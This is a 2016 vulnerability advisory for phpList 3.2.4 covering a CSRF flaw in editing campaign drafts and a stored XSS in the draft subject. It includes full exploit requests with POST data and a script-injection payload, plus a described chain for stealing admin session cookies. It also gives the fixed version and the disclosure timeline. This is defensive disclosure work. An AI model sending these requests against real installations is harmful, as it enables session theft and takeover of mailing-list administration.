######################################################################
# Exploit Title: PHPList v3.2.4 CSRF/XSS
# Date: 01/06/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: https://www.phplist.com/
# Version: 3.2.4
# Category: CSRF/XSS
######################################################################

PHPList description :
======================================================================
phpList is an open source software for managing mailing lists. It is designed for the dissemination of information, such as newsletters, news, advertising to list of subscribers. It is written in PHP and uses a MySQL database to store the information. phpList is free and open-source software subject to the terms of the Affero General Public License (AGPL).
  
Vulnerabilities description :
======================================================================
phpList version 3.2.4 is vulnerable to multiple vulnerabilities like :
- CSRF
- Stored XSS

Poc n°1 : CSRF on Campaign Draft modification
============================================
The draft modification process is vulnerable to CSRF attack. When using the form, we can see that a form anti-CSRF token is used but it can be removed from the request wihtout causing error. The only prerequisite to exploit this CSRF is to target an existing Draft ID. This can be done with a simple code tricks wich send multiple modification requests while incremeting the Draft ID for example. To modify the Draft 5, use the following parameters :

[URL]
http://server/admin/?page=send&id=5
[POSTDATA]
workaround_fck_bug=1&followupto=&subject=MODIFIED_SUBJECT&fromfield=AAAA&sendmethod=inputhere&sendurl=e.g.+http://www.phplist.com/testcampaign.html&message=<p>A1</p>&footer=A1&id=5&status=draft&save=Save+and+continue+editing&id=5&status=draft&campaigntitle=(no+title)&testtarget=

This vulnerability can make an authenticated user change campaign content an alter user experience.

PoC n°2 : Stored XSS on Campaign Draft Name
============================================
The campaign draft name, displayed when listing all campaign draft, is vulnerable to Stored XSS attack. This mean that the vulnerable code is saved in the database and displayed each time a admin/user go on the campaign draft list :
http://server/admin/?page=messages&tab=draft

The following request exploit this vulnerability : 

[URL]
http://server/admin/?page=send&id=5
[POSTDATA]
workaround_fck_bug=1&followupto=&subject=DATA"><script>alert("XSS_again")</script>&fromfield=AAAA&sendmethod=inputhere&sendurl=e.g.+http://www.phplist.com/testcampaign.html&message=<p>A1</p>&footer=A1&id=5&status=draft&save=Save+and+continue+editing&id=5&status=draft&campaigntitle=(no+title)&testtarget=

Note that once this request is submitted, the user is not directly on the page that display the XSS. He have to go on this page : http://server/admin/?page=messages&tab=draft

Through this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such cookies, and especially admin's ones. 

Using two simple HTML page with auto JavaScript redirection, an attacker can exploit these two vulnerabilities to change the campaign draft content to make it display a Javascescript instruction and then use this Javascript execution to steal session cookie or bypass all other anti-CSRF protection of the PHPlist installation. The scenario exploiting this two vulnerabilities is presented in the video in "Addtional resources" section.

Solution: 
======================================================================
- Update your PHPList installation to superior version (3.2.5 - https://www.phplist.org/newslist/phplist-3-2-5-whats-new/)

Additional resources :
======================================================================
- https://youtu.be/cU6ob4sCKgs
- https://www.phplist.org/newslist/phplist-3-2-5-whats-new/

Report timeline :
======================================================================
2016-05-11 : Advisory submitted to editor
2016-05-26 : Version 3.2.5 released with fixes
2016-06-01 : Public Advisory  release

Credits :
======================================================================
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/

--
SYNETIS 
CONTACT: www.synetis.com | www.information-security.fr